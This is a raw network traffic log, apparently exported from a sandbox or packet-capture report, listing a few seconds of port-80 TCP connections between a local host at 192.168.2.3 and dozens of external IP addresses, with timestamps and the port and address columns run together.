                                                                                                                                                                              Sep 15, 2023 07:26:04.851284027 CEST8049722142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.856642008 CEST4972380192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:04.914987087 CEST8049722142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.915047884 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:04.950484037 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950524092 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950540066 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950562954 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950579882 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950598955 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950617075 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.950715065 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.950716019 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.950716019 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.950716019 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.950716019 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.993588924 CEST80497233.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.993633032 CEST80497233.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.993658066 CEST4972380192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:04.993714094 CEST4972380192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.015387058 CEST4972380192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.019350052 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.019368887 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.019435883 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:05.019435883 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:05.101888895 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:05.103085995 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.103121996 CEST4972580192.168.2.3185.15.129.58
                                                                                                                                                                              Sep 15, 2023 07:26:05.103533983 CEST4972780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.121423006 CEST80497233.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.193202972 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.193481922 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:05.193912983 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:05.209232092 CEST80497273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.209440947 CEST4972780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.209626913 CEST4972780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.211602926 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:05.229789019 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:05.284914970 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.290041924 CEST804972662.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.290249109 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.314949036 CEST80497273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.314976931 CEST80497273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.315172911 CEST4972780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.320013046 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.320095062 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:05.323710918 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.325519085 CEST4972780192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:05.349303961 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:05.386454105 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.386527061 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:05.397058964 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:05.430716038 CEST80497273.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.439719915 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.510503054 CEST804972662.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.513710022 CEST804972662.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.513766050 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.531327009 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.572061062 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.572722912 CEST80497283.64.163.50192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.572793961 CEST4972880192.168.2.33.64.163.50
                                                                                                                                                                              Sep 15, 2023 07:26:05.694259882 CEST4973080192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:05.719552040 CEST804972662.122.190.121192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.719616890 CEST4972680192.168.2.362.122.190.121
                                                                                                                                                                              Sep 15, 2023 07:26:05.769223928 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:05.866045952 CEST8049731192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.866148949 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:05.866471052 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:05.884391069 CEST8049730185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.884459972 CEST4973080192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:05.884690046 CEST4973080192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:05.962881088 CEST8049731192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.963145018 CEST8049731192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:05.963294983 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:05.981674910 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:05.982361078 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:06.019743919 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.019782066 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.019798040 CEST8049729104.21.88.198192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.019826889 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:06.019851923 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:06.019851923 CEST4972980192.168.2.3104.21.88.198
                                                                                                                                                                              Sep 15, 2023 07:26:06.074985027 CEST8049730185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.076278925 CEST8049730185.80.51.179192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.076332092 CEST4973080192.168.2.3185.80.51.179
                                                                                                                                                                              Sep 15, 2023 07:26:06.080410957 CEST8049731192.124.249.10192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.080456972 CEST4973180192.168.2.3192.124.249.10
                                                                                                                                                                              Sep 15, 2023 07:26:06.170026064 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.224685907 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.225040913 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.225081921 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.238662004 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:06.289869070 CEST4973580192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:06.334690094 CEST8049734192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.334806919 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:06.335062981 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:06.351672888 CEST804973380.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.351789951 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.351937056 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.370474100 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.388113022 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:06.416207075 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.416388988 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:06.431094885 CEST8049734192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.433650970 CEST8049734192.252.154.18192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.433738947 CEST4973480192.168.2.3192.252.154.18
                                                                                                                                                                              Sep 15, 2023 07:26:06.468168974 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.468314886 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.468339920 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.468358040 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.468365908 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.468405008 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.468405008 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.483207941 CEST4973280192.168.2.3206.191.152.37
                                                                                                                                                                              Sep 15, 2023 07:26:06.490634918 CEST804973546.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.490812063 CEST4973580192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:06.505654097 CEST4973580192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:06.533627987 CEST804973380.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.533647060 CEST804973380.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.533819914 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.546614885 CEST8049736188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.546797037 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.548940897 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.549882889 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.588870049 CEST804973789.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.589087963 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:06.589323997 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:06.623639107 CEST4973880192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:06.706489086 CEST804973546.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.707326889 CEST804973546.242.238.60192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.707500935 CEST4973580192.168.2.346.242.238.60
                                                                                                                                                                              Sep 15, 2023 07:26:06.725135088 CEST8049736188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.725445032 CEST8049736188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.725594997 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.726345062 CEST8049732206.191.152.37192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.731610060 CEST804973380.74.154.6192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.731690884 CEST4973380192.168.2.380.74.154.6
                                                                                                                                                                              Sep 15, 2023 07:26:06.790060997 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.790154934 CEST804973789.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.790513039 CEST804973789.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.790561914 CEST804973789.161.163.246192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.790590048 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:06.790627956 CEST4973780192.168.2.389.161.163.246
                                                                                                                                                                              Sep 15, 2023 07:26:06.819714069 CEST4973980192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:06.830754042 CEST8049738193.166.255.171192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.830847025 CEST4973880192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:06.834773064 CEST4973880192.168.2.3193.166.255.171
                                                                                                                                                                              Sep 15, 2023 07:26:06.966557026 CEST8049736188.165.133.163192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:06.966749907 CEST4973680192.168.2.3188.165.133.163
                                                                                                                                                                              Sep 15, 2023 07:26:06.975745916 CEST4971080192.168.2.3137.118.26.67
                                                                                                                                                                              Sep 15, 2023 07:26:07.017988920 CEST8049739170.82.174.30192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.018085003 CEST4973980192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:07.018260956 CEST4973980192.168.2.3170.82.174.30
                                                                                                                                                                              Sep 15, 2023 07:26:07.041845083 CEST8049738193.166.255.171192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.041917086 CEST8049738193.166.255.171192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091315985 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091358900 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091394901 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091404915 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091430902 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091434002 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091485023 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091485023 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091504097 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091557026 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091559887 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091612101 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091658115 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091712952 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091757059 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091809034 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091840029 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.091887951 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.091939926 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092009068 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092063904 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092153072 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092190027 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092262030 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092294931 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092364073 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092412949 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092463970 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092519999 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092535973 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092585087 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092624903 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092678070 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092740059 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092776060 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092819929 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092845917 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092871904 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.092926025 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.092971087 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093020916 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093058109 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093096972 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093163967 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093192101 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093230963 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093271017 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093307972 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093323946 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093358994 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093374968 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093434095 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.093826056 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093863964 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.093992949 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094018936 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094032049 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094084978 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094101906 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094151020 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094168901 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094218969 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094237089 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094286919 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094331980 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094523907 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094718933 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094775915 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094805002 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094855070 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094872952 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.094921112 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.094961882 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095012903 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095082998 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095120907 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095145941 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095176935 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095228910 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095278978 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095642090 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095726013 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095794916 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095830917 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095833063 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.095856905 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095892906 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.095932961 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096002102 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096097946 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.096105099 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096122026 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.096163988 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.096338034 CEST4974080192.168.2.360.43.154.138
                                                                                                                                                                              Sep 15, 2023 07:26:07.096545935 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096667051 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096703053 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.096714973 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.096750021 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.096776009 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.100557089 CEST4974180192.168.2.3202.254.236.40
                                                                                                                                                                              Sep 15, 2023 07:26:07.132627964 CEST4974280192.168.2.3108.167.164.216
                                                                                                                                                                              Sep 15, 2023 07:26:07.175594091 CEST4974380192.168.2.366.94.119.160
                                                                                                                                                                              Sep 15, 2023 07:26:07.190532923 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190584898 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190665960 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190705061 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190757036 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.190758944 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190788031 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.190836906 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.190882921 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190922022 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190939903 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.190958977 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.190969944 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191030025 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191047907 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191095114 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191128969 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191167116 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191201925 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191240072 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191267014 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191303968 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191309929 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191370010 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191776037 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191816092 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191915035 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191940069 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191943884 CEST4972480192.168.2.3104.26.14.53
                                                                                                                                                                              Sep 15, 2023 07:26:07.191981077 CEST8049724104.26.14.53192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:07.191993952 CEST4972480192.168.2.3104.26.14.53
